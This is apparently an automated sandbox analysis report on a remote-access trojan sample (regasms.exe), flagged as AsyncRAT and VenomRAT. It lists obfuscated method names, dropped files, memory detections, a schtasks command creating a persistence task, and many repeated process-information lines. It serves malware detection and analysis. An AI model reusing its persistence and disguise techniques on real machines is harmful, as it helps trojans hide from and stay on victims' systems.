                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, wK8RGwY2TSdWw0MbWi.csHigh entropy of concatenated method names: 'KnPHhw513M', 'T8yHmoh9eZ', 'XIEH8r9XX0', 'vvJHWYN3Xu', 'vFHHqI3ylf', 'OqOHj5SZol', 'HEfHce1EXV', 'OQJHTnYN8g', 'Y5EHiU4gyc', 'NUeHIJCsh6'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, raWy8KSnBEG8OkGhsu.csHigh entropy of concatenated method names: 'Ahi03iBHew', 'WO80gLPrFd', 'Vc5016tF9Y', 'jsj0J9UxyQ', 'A7m0ebqWnO', 'kb50sjcNhk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, niY5NKzmET1X3aCafO.csHigh entropy of concatenated method names: 'dth0DV8fxZ', 'F5Z0hLg0gQ', 'AU90mEsfx9', 'aHs08RdtoK', 'H7Y0W92Jwe', 'wA10qyXepC', 'CdX0jhB3vR', 'BO80BILVom', 'ewq0ohb5G3', 'hr60FQMB9T'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, Uj2lPi2fHvRsqtTgiJ.csHigh entropy of concatenated method names: 'pd5eKsqkfv', 'rIBevt86Ys', 'tyNeeIxNjV', 'FdLeGY7xiM', 'h1geVmp7Zt', 'VjyeBLcTU8', 'Dispose', 'QX4dXCas6A', 'KghdnhkAss', 'JIHd3urtWL'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, blTGy1n8gTX83m6JaG.csHigh entropy of concatenated method names: 'Dispose', 'qRslQqtTgi', 'OBa9WZhcyD', 'HPEif1OpCb', 'jN5lSBxNkw', 'U14lzZTdba', 'ProcessDialogKey', 'm5w9pPlAdE', 'YYp9lDd771', 'WMR99eaWy8'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, y6ZHmbtF4C8h68N4Sn.csHigh entropy of concatenated method names: 'wGPlJVRdyl', 'F8jlsubWD8', 'E9BlLEghFp', 'QZBl46cDXl', 'S22lK2Iiqv', 'OVwlwVDxJK', 'Yt9GOaFlfgxiF74PLx', 'OUvP8EQLoVSmh0NRb1', 'W1NllJ3PH6', 'eYOlEJn1bg'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, sfIBMmm9BEghFpYZB6.csHigh entropy of concatenated method names: 'Run3bHWN1H', 'FLO3D5CvYF', 'wqY3h3Cm8S', 'pd73mfiNpK', 'COC3KPDWVa', 'cD83w5MHLT', 'vXi3vqMAGF', 'Kke3d4uwpL', 'f6Y3erHsTS', 'IGQ30qcFN9'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, I8lrsDOgbkDxRsBvwr.csHigh entropy of concatenated method names: 'ThRJor0e35', 'wb6JFquv4o', 'CfeJklhhVR', 'TRmJbRRq8G', 'bxAJN34dWU', 'gRUJDG5fya', 'hJAJf5n9mI', 'fPIJhKaltp', 'bYmJmGNtQV', 'otyJA6OK0W'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, OqvIVw8VDxJKNW7onY.csHigh entropy of concatenated method names: 'tt21ZBWmXF', 'k7R1nM6XaS', 'Iny1gbRYdA', 'rV71JYR4RI', 'cvq1sKRU6d', 'e17gCrm8kq', 'A9Rg65AjAV', 'm0Rg2mgo4V', 'hW7gyE0AfG', 'ebJgQivrQS'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.csHigh entropy of concatenated method names: 'Y2PEZDdMVt', 'Va9EXUrBH5', 'ltSEnyrb8X', 'rIGE3cWM6L', 'GHoEg07q3G', 'OdGE15BDrj', 'CNnEJBD49m', 'gs3EsJOTfg', 'ifBEPlSa43', 'FUPELZRqh4'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, VvrwtClpAQXNMyeuTfQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm3X0IB9gYY', 'XPi0RdKHqs', 'PZi0YXQpsg', 'LXs0xkim7B', 'VoJ0ajvegw', 'mbg0UfW8Kn', 'p4s0M2E2tl'
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile created: C:\Users\user\AppData\Roaming\NotepadUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\regasms.exeJump to dropped file

                  Boot Survival

                  barindex
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Yara detected VenomRAT
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Roaming\regasms.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
